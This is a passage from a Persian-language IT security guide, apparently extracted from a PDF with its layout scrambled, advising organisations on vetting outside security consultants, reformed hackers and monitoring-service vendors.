ﺍﺯ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﻣﻲﺧﻮﺍﻫﻴﺪ ﺑﺮﺍﻱ ﺷﻤﺎ ﻛﺎﺭ ﻛﻨﻨﺪ ﺑﭙﺮﺳـﻴﺪ ﻛـﻪ ﺁﻳـﺎ
ﺑﻴﻤﻪ ﻫﺴﺘﻨﺪ ﻭ ﺗﻌﻬﺪ ﺳﭙﺮﺩﻩﺍﻧﺪ ﻳﺎ ﺧﻴﺮ .ﺍﻳﻨﻜﺎﺭ ﻧﺸﺎﻥ ﻣﻲﺩﻫﺪ ﻛـﻪ
ﺷﺮﻛﺖ ﺁﻧﻬﺎ ﺑﻪ ﺷﺎﻳﺴﺘﮕﻲ ﻭ ﺭﻓﺘﺎﺭ ﺍﻓﺮﺍﺩ ﺍﻫﻤﻴﺖ ﻣﻲﺩﻫﺪ .ﺍﻳﻨﻜـﺎﺭ
ﺗﻀﻤﻴﻦ ﻧﻤﻲﻛﻨـﺪ ﻛـﻪ ﺁﻥ ﺳـﺎﺯﻣﺎﻥ ﻭﺍﺟـﺪ ﺷﺎﻳـﺴﺘﮕﻴﻬﺎﻱ ﻻﺯﻡ
ﺑﺎﺷﺪ ،ﺍﻣﺎ ﺑﻪ ﻧﻮﻋﻲ ﺍﻃﻤﻴﻨﺎﻥ ﻣـﻲﺩﻫـﺪ ﻛـﻪ ﻛﺎﺭﻛﻨـﺎﻥ ﺁﻥ ﺳـﻮﺀ
ﭘﻴﺸﻴﻨﺔ ﺟﻨﺎﻳﻲ ﻧﺪﺍﺭﻧﺪ.
ﺭﺍﺑﻄﻪﻫﺎ
ﺍﺯ ﺍﻓــﺮﺍﺩ ﺑﭙﺮﺳــﻴﺪ ﻛــﻪ ﺩﺭ ﻛــﺪﺍﻡ ﺳــﺎﺯﻣﺎﻧﻬﺎﻱ ﻣﺤﻠــﻲ ،ﻣﻠــﻲ ﻭ
ﺑـــﻴﻦﺍﻟﻤﻠﻠـــﻲ ) ،IEEE ،CSI ،ASIS ،ACMﻭ (UNISEXﻋـــﻀﻮ
ﻫﺴﺘﻨﺪ ﻭ ﺁﻳﺎ ﺍﺭﺗﺒﺎﻁ ﻣﻄﻠﻮﺑﻲ ﺑﺎ ﺁﻧﻬﺎ ﺩﺍﺭﻧﺪ ﻳﺎ ﺧﻴﺮ .ﺍﻳﻦ ﺳـﺎﺯﻣﺎﻧﻬﺎ
ﺑﺮﺍﻱ ﺍﻋﻀﺎﻱ ﺧـﻮﺩ ﻣﻄﺎﻟـﺐ ﺁﻣﻮﺯﺷـﻲ ﻭ ﻓﺮﺻـﺘﻬﺎﻱ ﭘﻴـﺸﺮﻓﺖ
ﺗﺨﺼﺼﻲ ﻣﻬﻴﺎ ﻣﻲﺳﺎﺯﻧﺪ ﻭ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﺁﻧﻬـﺎ ﻧﻴـﺰ ﺑـﺮﺍﻱ ﺭﻓﺘـﺎﺭ
ﺣﺮﻓﻪﺍﻱ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﻣﻨﺘﺸﺮ ﻣﻲﻛﻨﻨﺪ .ﺍﮔﺮ ﺳﻮﮊﺓ ﺷﻤﺎ ﺗﻨﻬﺎ ﻣـﺪﻋﻲ
ﺳﺎﺑﻘﺔ ﻋـﻀﻮﻳﺖ ﺩﺭ ﮔﺮﻭﻫﻬـﺎﻳﻲ ﻣﺜـﻞ " The 133t Hax0r
"Guildﺍﺳﺖ ﺷﺎﻳﺪ ﺑﻬﺘـﺮ ﺑﺎﺷـﺪ ﺟـﺎﻱ ﺩﻳﮕـﺮﻱ ﺑـﺪﻧﺒﺎﻝ ﻳـﻚ
ﻛﺎﺭﺷﻨﺎﺱ ﺍﻣﻨﻴﺖ ﺑﮕﺮﺩﻳﺪ!
۱۱۴ﺁﻣﺎﺭﻫﺎﻱ ﻣﺮﺑﻮﻁ ﺑﻪ ﺷﺮﻛﺘﻬﺎﻱ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﻛﻪ ﻧﻔـﻮﺫﮔﺮﺍﻥ ﺍﺻـﻼﺡ-
ﺷﺪﻩ ﺭﺍ ﺑﻜﺎﺭ ﮔﺮﻓﺘﻪ ﺑﻮﺩﻧﺪ ﺩﺭ "ﺗﺤﻘﻴﻖ ﺟﺮﻡ ﻭ ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﻪﺍﻱ" ﺳـﺎﻝ
CSI/FBI ۲۰۰۳ﺁﻣﺪﻩ ﺍﺳﺖ:
112 Purdue University
113 The University of California at Davis
http://i.cmpnet.com/gocsi/db_area/pdfs/fbi/FBI
2003.pdf
ﺑﺨﺶ ﺳﻮﻡ
ﺍﮔﺮ ﻛﺴﻲ ﻳﻚ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﺔ ﭘﺮﻛﺎﺭﺑﺮﺩ ﻧﻮﺷـﺘﻪ ﺑﺎﺷـﺪ ﻳـﺎ ﺩﺭ ﻳـﻚ
ﻣﻮﺿﻮﻉ ﺍﻣﻨﻴﺘﻲ ﻣﺜﻞ ﻭﻳﺮﻭﺱ ﻳﺎ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﺘﺎﺑﻲ ﺗـﺄﻟﻴﻒ ﻛـﺮﺩﻩ
ﺑﺎﺷﺪ ﺑﺪﺍﻥ ﻣﻌﻨﺎ ﻧﻴﺴﺖ ﻛﻪ ﺑﺎ ﻣﻘﻮﻟﺔ ﺍﻣﻨﻴﺖ ﺑﻄﻮﺭ ﻛﺎﻣﻞ ﺁﺷﻨﺎﺳﺖ.
ﺑﺮﺧﻲ ﺍﺯ ﻧﻮﻳﺴﻨﺪﮔﺎﻥ ﺳﺎﺑﻘﺔ ﺯﻳﺎﺩﻱ ﺩﺭ ﺩﺍﻣﻨﺔ ﻭﺳـﻴﻌﻲ ﺍﺯ ﻣـﺴﺎﺋﻞ
ﺍﻣﻨﻴﺘﻲ ﺩﺍﺭﻧﺪ ،ﺍﻣﺎ ﺑﺮﺧﻲ ﺩﻳﮕﺮ ﺗﻨﻬﺎ ﻧﻮﻳﺴﻨﺪﮔﺎﻥ ﻳﺎ ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺴﺎﻥ
ﺧﻮﺑﻲ ﻫﺴﺘﻨﺪ .ﺁﮔﺎﻩ ﺑﺎﺷﻴﺪ ﻛﻪ ﺷـﻬﺮﺕ ﺯﻳـﺎﺩ ﻟﺰﻭﻣـﹰﺎ ﺑـﻪ ﻣﻌﻨـﺎﻱ
ﺷﺎﻳﺴﺘﮕﻲ ﺑﺮﺍﻱ ﻣﺸﺎﻭﺭﻩ ﻧﻤﻲﺑﺎﺷﺪ.
ﻧﻔﻮﺫﮔﺮﺍﻥ ﺍﺻﻼﺡ ﺷﺪﻩ
١٧٢
.۳
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﺩﺳﺖ ﺁﺧﺮ ﺍﻳﻨﻜﻪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻧﻔﻮﺫﮔﺮﺍﻥ ﺍﻣـﺮﻭﺯﻱ ﭼﻨـﺪﺍﻥ
ﻫﻢ ﺑﻪ ﻣﺒﺎﺣﺚ ﺍﻣﻨﻴﺘﻲ ﻭﺍﺭﺩ ﻧﻴﺴﺘﻨﺪ .ﺁﻧﻬﺎ ﻫـﻢ ﺩﺭ ﺭﻭﺵ ﻭ
ﻫﻢ ﺩﺭ ﺷﻴﻮﺓ ﻛﺎﺭ ﺑﻴﺸﺘﺮ ﻣﺎﻧﻨﺪ ﺗﺒﻬﻜـﺎﺭﺍﻥ ﺟﻨـﺎﻳﻲ ﻋﻤـﻞ
ﻣﻲﻛﻨﻨﺪ ﺗﺎ ﺑﺮﻧﺎﻣـﻪ ﻧﻮﻳـﺴﺎﻥ ﻭ ﻣﻌﻤـﺎﺭﺍﻥ ﺭﺍﻳﺎﻧـﻪ ﺍﻱ .ﺍﻳـﻦ
ﻛﻴﻔﻴﺖ ﭘﺎﺋﻴﻦ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬـﺎﻱ ﺍﻣـﺮﻭﺯﻱ ،ﻓﻘـﺪﺍﻥ ﺭﻭﻧـﺪ
ﺍﻣﻨﻴﺖ ﺩﺭ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻳﻬﺎ ،ﻭ ﺩﺭ ﺩﺳـﺘﺮﺱ ﺑـﻮﺩﻥ ﮔـﺴﺘﺮﺩﺓ
ﺍﺑﺰﺍﺭﻫﺎﻱ ﻧﻔﻮﺫ ﺧﻮﺩﻛﺎﺭ ﺍﺳﺖ ﻛﻪ ﺑﺎﻋﺚ ﺷﺪﻩ ﺩﺳﺖﻳـﺎﺯﻱ
ﻭ ﺣﻤﻠﻪ ﺑﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺴﺎﺩﮔﻲ ﻣﻴـﺴﺮ ﺑﺎﺷـﺪ.
ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﻳﻜﻨﻔﺮ ﺑﺎ ﺳﺎﺑﻘﺔ ﭘﺮﺵ ﺑﺎ ﺍﺗﻮﻣﺒﻴﻞ ﻟﺰﻭﻣﹰﺎ ﻳﻚ
ﺭﺍﻧﻨﺪﺓ ﻣﺎﻫﺮ ﻣﺎﺷﻴﻦ ﻣﺴﺎﺑﻘﻪ ﻳﺎ ﻳﻚ ﻃـﺮﺍﺡ ﺧﺒـﺮﺓ ﻣﻮﺗـﻮﺭ
ﺍﺗﻮﻣﺒﻴﻞ ﻧﻴﺴﺖ ،ﻛﺴﻲ ﻛﻪ ﻣﻲ ﺩﺍﻧﺪ ﭼﮕﻮﻧـﻪ ﺍﺯ ﺍﺑﺰﺍﺭﻫـﺎﻱ
ﻧﻔﻮﺫ ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﻛﻨﺪ ﻭ ﺣﻤـﻼﺕ ﺗﺨﺮﻳـﺐ ﺳـﺮﻭﻳﺲ ﺭﺍ
ﺍﻧﺠﺎﻡ ﺩﻫﺪ ﻧﻴﺰ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭ ﻓﻬﻢ ﺧﻮﺩ ﺍﺯ ﺍﻣﻨﻴﺖ ﻣﻮﺭﺩ
ﻧﻴﺎﺯ ﺑﺮﺍﻱ ﺍﻳﻤﻦ ﻧﮕﻬﺪﺍﺷﺘﻦ ﺳﻴـﺴﺘﻤﻬﺎ ﺩﭼـﺎﺭ ﻣـﺸﻜﻼﺕ
ﺑﻨﻴﺎﺩﻳﻦ ﺑﺎﺷﺪ.
ﻛﺎﺭﻱ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﻨﺪ.
.۲
ﺩﺭ ﻣﻮﺭﺩ ﺧﺮﺍﺑﻴﻬﺎﻱ ﺗﺠﻬﻴﺰﺍﺕ ﺍﺯ ﻛﺴﻲ ﻛﻪ ﻣـﺴﺌﻮﻟﻴﺖ ﺁﻥ
ﺟﺰﺀ ﺑﺮ ﻋﻬﺪﺓ ﺍﻭ ﺍﺳﺖ ﮔﺰﺍﺭﺵ ﻛﺘﺒﻲ ﺩﺭﻳﺎﻓﺖ ﻛﻨﻴﺪ .ﺍﮔـﺮ
ﺳﺨﺖﺍﻓﺰﺍﺭ ﻳﺎ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻛﻪ ﺭﻭﻱ ﺳﻴﺴﺘﻢ ﻧـﺼﺐ ﺷـﺪﻩ
ﺩﺍﺩﻩﻫﺎﻱ ﺷﻤﺎ ﺭﺍ ﺑﻪ ﺩﻧﻴﺎﻱ ﺧﺎﺭﺝ ﺍﺯ ﺳﺎﺯﻣﺎﻥ ﺑﻔﺮﺳـﺘﺪ ﻳـﺎ
ﺩﺭ ﭘﺮﻛــﺎﺭﺑﺮﺩﺗﺮﻳﻦ ﺳــﺎﻋﺎﺕ ﺭﻭﺯ ﺑــﺼﻮﺭﺕ ﻏﻴﺮﻣﻨﺘﻈــﺮﻩ
ﺳﻴﺴﺘﻤﻬﺎﻱ ﺷﻤﺎ ﺭﺍ ﺍﺯ ﻛﺎﺭ ﺑﻴﺎﻧﺪﺍﺯﺩ ،ﻧﺒﺎﻳﺪ ﻧﺎﮔﻬﺎﻥ ﻣﺘﻮﺟـﻪ
ﺷﻮﻳﺪ ﻃﺒﻖ ﺗﻮﺍﻓﻘﻲ ﻛـﻪ ﺑـﺎ ﻓﺮﻭﺷـﻨﺪﻩ ﺩﺍﺷـﺘﻪﺍﻳـﺪ ﻫـﻴﭻ
ﻣﺴﺌﻮﻟﻴﺘﻲ ﻣﺘﻮﺟﻪ ﺍﻭ ﻧﻴﺴﺖ!
.۳
ﺧﺎﻃﺮﺟﻤﻊ ﺷﻮﻳﺪ ﻛﻪ ﺩﺭ ﺗﻮﺳﻌﻪ ،ﺁﺯﻣـﺎﻳﺶ ﻭ ﺍﺳـﺘﻘﺮﺍﺭ ﺁﻥ
ﻓﻨﺎﻭﺭﻱ ﻛﻪ ﺑﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺷﻤﺎ ﺍﻓﺰﻭﺩﻩ ﻣﻲﺷﻮﺩ ﻣﺮﺍﻗﺒﺖ
ﺩﻗﻴﻖ ﺍﻧﺠﺎﻡ ﺷﺪﻩ ﺍﺳﺖ؛ ﺑﻮﻳﮋﻩ ﺍﮔﺮ ﻃﺮﺍﺣﻲ ﻣﻨﺤـﺼﺮ ﺑـﻪ
ﻓﺮﺩﻱ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ .ﺑﻄﻮﺭ ﺧـﺎﺹ ،ﺑـﺎ ﺗﻮﺟـﻪ ﺑـﻪ ﺳـﻮﺍﺑﻖ
ﻛﻴﻔــﻲ ﻭ ﻣــﺴﺎﺋﻞ ﺍﻣﻨﻴﺘــﻲ ﻧــﺮﻡﺍﻓﺰﺍﺭﻫــﺎﻱ ﺷــﺮﻛﺖ
ﻣﺎﻳﻜﺮﻭﺳــﺎﻓﺖ ،ﭘﻴــﺸﻨﻬﺎﺩ ﻣــﻲﻛﻨــﻴﻢ ﺑــﺮﺍﻱ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ
ﺧﺪﻣﺎﺕ ﻫﺮ ﺷﺮﻛﺘﻲ ﻛﻪ ﺗﺼﻤﻴﻢ ﮔﺮﻓﺘﻪ ﻓﻨـﺎﻭﺭﻱ ﺍﻣﻨﻴـﺖ
ﺧﻮﺩ ﺭﺍ ﺑﺮ ﻣﺒﻨﺎﻱ ﻣﺤﺼﻮﻻﺕ ﻣﺎﻳﻜﺮﻭﺳـﺎﻓﺖ ﻗـﺮﺍﺭ ﺩﻫـﺪ
ﺩﻗــﺖ ﻻﺯﻡ ﺭﺍ ﺑﻌﻤــﻞ ﺁﻭﺭﻳــﺪ؛ ﭼﺮﺍﻛــﻪ ﺁﻥ ﺷــﺮﻛﺖ ﺑﺎﻳــﺪ
ﻫﻤﻮﺍﺭﻩ ﻣﻌﺎﻳﺐ ﻳﺎﻓﺖﺷﺪﺓ ﺟﺪﻳﺪ ﺭﺍ ﺩﺭ ﺑﻴﺸﺘﺮ ﻣﺤﺼﻮﻻﺕ
ﺞ ﺧــﻮﺩ ﺭﻓــﻊ ﻛﻨــﺪ ﻭ ﺩﺭ ﻋــﻴﻦ ﺣــﺎﻝ ﺳــﺎﺯﮔﺎﺭﻱ ﺁﻥ
ﺭﺍﻳـ ﹺ
ﻣﺤﺼﻮﻻﺕ ﺑﺎ ﻧﺴﺨﻪﻫﺎﻱ ﻗﺒﻠﻲ ﺭﺍ ﻧﻴﺰ ﺣﻔﻆ ﻧﻤﺎﻳﺪ.
.۴
ﺍﻳﻨﻜﻪ ﻓﻨﺎﻭﺭﻱ ﺷﺮﻛﺖ ﻣﻮﺭﺩ ﻧﻈﺮ ﻭﺍﻗﻌﹰﺎ ﺑـﻪ ﺟﻠـﻮﮔﻴﺮﻱ ﺍﺯ
ﺑﺮﻭﺯ ﻣﺸﻜﻼﺕ ﻛﻤﻚ ﻣﻲﻛﻨﺪ ﻳﺎ ﺑﻌﺪ ﺍﺯ ﻭﻗﻮﻉ ﻣﺸﻜﻞ ﭘﻲ
ﺑﻪ ﻭﺟﻮﺩ ﺁﻥ ﻣﻲﺑﺮﺩ ﺭﺍ ﺑﻪ ﺩﻗﺖ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﺩﻫﻴﺪ.
ﺧﺪﻣﺎﺕ ﻧﻈﺎﺭﺕ
ﺍﮔﺮ ﻭﺿﻌﻴﺖ ﻋﻤﻮﻣﻲ ﭘﺎﻳﺪﺍﺭ ﺑﺎﺷﺪ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺧـﺪﻣﺎﺕ ﻧﻈـﺎﺭﺕ ﻭ
ﻛﻨﺘﺮﻝ ﺳﺮﻣﺎﻳﻪ ﮔﺬﺍﺭﻱ ﺧﻮﺑﻲ ﻣﺤﺴﻮﺏ ﻣﻲﺷﻮﺩ .ﺧﺪﻣﺎﺕ ﺭﺍﻳﺠﻲ
ﻛﻪ ﺑﺼﻮﺭﺕ ﺭﻭﺯﻣﺮﻩ ﺍﺭﺍﺋﻪ ﻣﻲﺷﻮﻧﺪ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ ﺭﺍﻫﺒﺮﻱ ﻣﺤﻞ ﻛﺎﺭ
ﭘﻴﻤﺎﻧﻜﺎﺭﺍﻥ ،ﻧﻈﺎﺭﺕ ﺑﺮ ﺍﻣﻨﻴﺖ ﻣﺤﻞ ﻛﺎﺭ ﻭ ﺧﺎﺭﺝ ﺍﺯ ﺁﻥ ،ﻭﺍﻛـﻨﺶ
ﺑﻪ ﺭﺧﺪﺍﺩ ﻭ ﭘﻴﮕﺮﺩ ﻗـﺎﻧﻮﻧﻲ )ﺩﺭﺻـﻮﺭﺕ ﺩﺭﺧﻮﺍﺳـﺖ( ﻭ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﺍﺯ
ﻳﻚ ﺳﺎﻳﺖ ﺟﺎﻳﮕﺰﻳﻦ ﺑـﺮﺍﻱ ﺍﺳـﺘﻔﺎﺩﻩ ﺩﺭ ﻭﻗـﺖ ﺧﺮﺍﺑـﻲ ﺳـﺎﻳﺖ
ﺍﺻﻠﻲ .ﺍﻣﺎ ﻋﻼﻭﻩ ﺑﺮ ﻧﮕﺮﺍﻧﻲ ﺩﺭ ﺧﺼﻮﺹ ﺍﻓـﺮﺍﺩﻱ ﻛـﻪ ﺧـﺪﻣﺎﺕ
ﻣــﺸﺎﻭﺭﻩﺍﻱ ﺍﺭﺍﺋــﻪ ﻣــﻲﺩﻫﻨــﺪ ﺑﺎﻳــﺪ ﻣﺮﺍﻗــﺐ ﺳــﺨﺖﺍﻓﺰﺍﺭﻫــﺎ ﻭ
ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﺓ ﺁﻧﻬﺎ ﻫﻢ ﺑﺎﺷﻴﺪ.
ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺷﺮﻛﺘﻬﺎﻱ ﺧﺪﻣﺎﺕ ﻧﻈـﺎﺭﺗﻲ ﻭ ﻭﺍﻛـﻨﺶ ﺑـﻪ ﺭﺧـﺪﺍﺩ،
ﺳﺨﺖﺍﻓﺰﺍﺭﻫﺎ ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻳﻲ ﺩﺍﺭﻧﺪ ﻛﻪ ﻣﻲﺧﻮﺍﻫﻨﺪ ﺭﻭﻱ ﺷـﺒﻜﺔ
ﺷﻤﺎ ﻧﺼﺐ ﻛﻨﻨﺪ .ﺁﻧﻬﺎ ﺍﺯ ﺍﻳﻨﻜﺎﺭ ﺑﺮﺍﻱ ﺟﻤﻊﺁﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻻﺯﻡ
ﺟﻬــﺖ ﺑــﺎﺯﺑﻴﻨﻲ ﻭ ﺗﻐﻴﻴــﺮ ﺗﻨﻈﻴﻤــﺎﺕ ﺍﻣﻨﻴﺘــﻲ ﺳﻴــﺴﺘﻢ ﺍﺳــﺘﻔﺎﺩﻩ
ﻣﻲﻧﻤﺎﻳﻨﺪ .ﺑﺎﻳﺪ ﺑﺎ ﺍﻳﻦ ﻓﻨﺎﻭﺭﻱ ﺑﺮﺧﻮﺭﺩ ﻣﺤﺘﺎﻃﺎﻧﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﻴﺪ؛
ﭼﺮﺍﻛﻪ ﺩﺭ ﻣﻮﻗﻌﻴﺘﻲ ﻣﺠﺎﺯ ﻭ ﺩﺭﻭﻥ ﺩﺍﻳﺮﺓ ﺍﻣﻨﻴﺘﻲ ﺷﻤﺎ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ
ﺍﺳﺖ:
.۱
ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﺍﺯ ﻋﻤﻠﻜﺮﺩ ﺍﺟـﺰﺍﻱ ﻣﺨﺘﻠـﻒ ﺷـﺒﻜﻪ ﻭ
ﺗﺠﻬﻴــﺰﺍﺕ ﺁﻥ ﺗﻮﺿــﻴﺤﺎﺕ ﻛﺎﻣــﻞ ﻭ ﻛﺘﺒــﻲ ﺩﺭﻳﺎﻓــﺖ
ﻣﻲﻛﻨﻴﺪ .ﻫﻤﭽﻨﻴﻦ ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻـﻞ ﻛﻨﻴـﺪ ﻛـﻪ ﻣﺘﻮﺟـﻪ
ﻣﻲﺷﻮﻳﺪ ﺁﻥ ﺍﺟﺰﺍ ﭼﮕﻮﻧﻪ ﻛﺎﺭ ﻣـﻲﻛﻨﻨـﺪ ﻭ ﻫﺮﻳـﻚ ﭼـﻪ
ﻛﻼﻡ ﺁﺧﺮ ﭘﻴﺮﺍﻣﻮﻥ ﻣﻨﺎﺑﻊ ﺧﺎﺭﺝ ﺍﺯ ﺳﺎﺯﻣﺎﻥ
ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ﻛﺎﺭﺷﻨﺎﺳــﺎﻥ ﺑﻴﺮﻭﻧــﻲ ﺭﺍﻩ ﺧــﻮﺑﻲ ﺑــﺮﺍﻱ ﺗــﺄﻣﻴﻦ
ﺣﻔﺎﻇﺘﻬــﺎﻱ ﻻﺯﻡ ﻣــﻲﺑﺎﺷــﺪ .ﻣﻬﺎﺭﺗﻬــﺎﻳﻲ ﻛــﻪ ﺑــﺮﺍﻱ ﺗــﺪﻭﻳﻦ
ﺳﻴﺎﺳﺘﻬﺎ ،ﻧﻈﺎﺭﺕ ﺑﺮ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﻣﻬـﺎﺟﻢﻳـﺎﺏ ﻭ ﺩﻳـﻮﺍﺭﻩﻫـﺎﻱ
ﺁﺗﺶ ،ﻭ ﺁﻣﺎﺩﻩﺳﺎﺯﻱ ﻭ ﺍﺟﺮﺍﻱ ﺑﺮﻧﺎﻣﺔ ﺗﺮﻣﻴﻢ ﺍﺯ ﺳﻮﺍﻧﺢ ﻻﺯﻡ ﺍﺳﺖ
ﺑﻌﻀﹰﺎ ﺑﺴﻴﺎﺭ ﺗﺨﺼﺼﻲ ﻭ ﻧﺎﻣﺘﻌﺎﺭﻑ ﻫـﺴﺘﻨﺪ ﻭ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺩﺭ
ﻣﻴﺎﻥ ﻛﺎﺭﻣﻨﺪﺍﻥ ﻓﻌﻠـﻲ ﺳـﺎﺯﻣﺎﻥ ﻭﺟـﻮﺩ ﻧﺪﺍﺷـﺘﻪ ﺑﺎﺷـﻨﺪ .ﺍﻧﺠـﺎﻡ
ﺻﺤﻴﺢ ﻫﻤﻴﻦ ﻛﺎﺭﻫﺎﺳﺖ ﻛﻪ ﺩﺭ ﺗﺪﺍﻭﻡ ﻳﻚ ﺗﺠـﺎﺭﺕ ﻳـﺎ ﺧﺎﺗﻤـﺔ
ﺁﻥ ﺑﻪ ﻋﻠﺖ ﺑﺮﻭﺯ ﻋﻴﺐ ﻭ ﻧﻘﺼﻬﺎﻱ ﻣﺨﺘﻠﻒ ،ﺗﻌﻴﻴﻦﻛﻨﻨﺪﻩ ﺍﺳﺖ.
ﺩﺭ ﻋﻴﻦ ﺣﺎﻝ ﺣﻮﺯﺓ ﻣﺸﺎﻭﺭﺓ ﺍﻣﻨﻴﺖ ﺑﺎ ﺧﻄﺮ ﺭﻭﺑﺮﻭ ﺍﺳﺖ؛ ﭼﺮﺍﻛـﻪ
ﭘﺪﻳﺪﻩﺍﻱ ﺟﺪﻳﺪ ﺍﺳﺖ ﻭ ﺑﺨﻮﺑﻲ ﺩﺭﻙ ﻧﻤﻲ ﺷﻮﺩ .ﺍﻓﺮﺍﺩ ﺷﺎﺭﻻﺗﺎﻥ،
ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
١٧٣
ﺣﻘﻪﺑﺎﺯ ،ﺑﻲﺗﺠﺮﺑﻪ ﻭ ﺗﺎﺯﻩﻛﺎﺭ ﻫﻤﻴﺸﻪ ﻭﺟﻮﺩ ﺩﺍﺭﻧـﺪ ﻭ ﺩﺭ ﺑـﺴﻴﺎﺭﻱ
ﻣﻮﺍﺭﺩ ﻧﻤﻲﺗﻮﺍﻥ ﺁﻧﻬﺎ ﺭﺍ ﺍﺯ ﺍﻓﺮﺍﺩ ﻗﺎﺑﻞ ﺍﻋﺘﻤﺎﺩ ﻭ ﺣﺮﻓـﻪﺍﻱ ﻛـﻪ ﺩﺭ
ﺍﻳﻦ ﺯﻣﻴﻨﻪ ﻛـﺎﺭ ﻣـﻲﻛﻨﻨـﺪ ﺗﻤﻴـﺰ ﺩﺍﺩ .ﺍﻟﺒﺘـﻪ ﮔﺬﺷـﺖ ﺯﻣـﺎﻥ ﺑـﻪ
ﺗﺸﺨﻴﺺ ﻣﺴﺎﺋﻞ ﻛﻤﻚ ﻣﻲﻛﻨﺪ ،ﺍﻣﺎ ﺍﻧﺘﺨـﺎﺏ ﺻـﺤﻴﺢ ﺩﺭ ﮔـﺎﻡ
ﺍﻭﻝ ﺑﻪ ﻣﻘﺪﺍﺭﻱ ﺗﻼﺵ ﻭ ﺳﺮﻣﺎﻳﻪ ﻧﻴﺎﺯ ﺩﺍﺭﺩ.
ﻳﻚ ﺭﺍﻩ ﻛﻪ ﺑﺮﺍﻱ ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﺷﻤﺎ ﺍﺯ ﺭﺷﺪ ﺍﻳﻦ ﺣﻮﺯﻩ ﭘﻴـﺸﻨﻬﺎﺩ
ﻣﻲﺷﻮﺩ ﺩﻭﺭﻱ ﺟـﺴﺘﻦ ﺍﺯ ﺍﻧﻌﻘـﺎﺩ ﻗﺮﺍﺭﺩﺍﺩﻫـﺎﻱ ﻃـﻮﻻﻧﻲ ﻣـﺪﺕ
ﺍﺳﺖ؛ ﻣﮕﺮ ﺁﻧﻜﻪ ﺗﺄﻣﻴﻦﻛﻨﻨﺪﺓ ﺧﺪﻣﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺷﻤﺎ ﺑـﺴﻴﺎﺭ ﻣـﻮﺭﺩ
ﺍﻃﻤﻴﻨﺎﻥ ﺑﺎﺷﺪ ﻭ ﻫﻤﻮﺍﺭﻩ ﺧﻮﺩ ﺭﺍ ﺑـﻪﺭﻭﺯ ﻧﮕـﻪ ﺩﺍﺭﺩ .ﭼـﺸﻢﺍﻧـﺪﺍﺯ
ﻣﺸﺎﻭﺭﺓ ﺍﻣﻨﻴﺖ ﺩﺭ ﭼﻨﺪ ﺳﺎﻝ ﺁﻳﻨﺪﻩ ﻣﺴﺘﻌﺪ ﺗﻐﻴﻴﺮﺍﺕ ﺯﻳﺎﺩ ﺍﺳﺖ ،ﻭ
ﺍﮔﺮ ﺩﺭ ﻫﺮ ﺯﻣﺎﻥ ﺑﺘﻮﺍﻧﻴﺪ ﮔﺰﻳﻨﻪﻫﺎﻱ ﻣﺨﺘﻠﻔﻲ ﻛـﻪ ﻫﻤـﺮﺍﻩ ﺑـﺎ ﺁﻥ
ﺗﻐﻴﻴﺮﺍﺕ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻳﻨﺪ ﺭﺍ ﺍﻧﺘﺨﺎﺏ ﻛﻨﻴـﺪ ﻣﻨـﺎﻓﻊ ﺧﻮﺩﺗـﺎﻥ ﺑﻬﺘـﺮ
ﺗﺄﻣﻴﻦ ﺧﻮﺍﻫﺪ ﺷﺪ.
ﺑﺨﺶ ﺳﻮﻡ
ﺳﺮﺍﻧﺠﺎﻡ ﻋﻠﻴﺮﻏﻢ ﺍﻳﻨﻜﻪ ﺷﻤﺎ ﺑـﺮﺍﻱ ﺩﺭﻳﺎﻓـﺖ ﺧـﺪﻣﺎﺗﻲ ﻗـﺮﺍﺭﺩﺍﺩ
ﺑﺴﺘﻪﺍﻳﺪ ﻛﻪ ﺩﺭ ﻗﺒﺎﻝ ﺍﺳﺘﻔﺎﺩﺓ ﻧﺎﺩﺭﺳﺖ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻳﺘﺎﻥ ﺑﺮ ﺁﻧﻬـﺎ
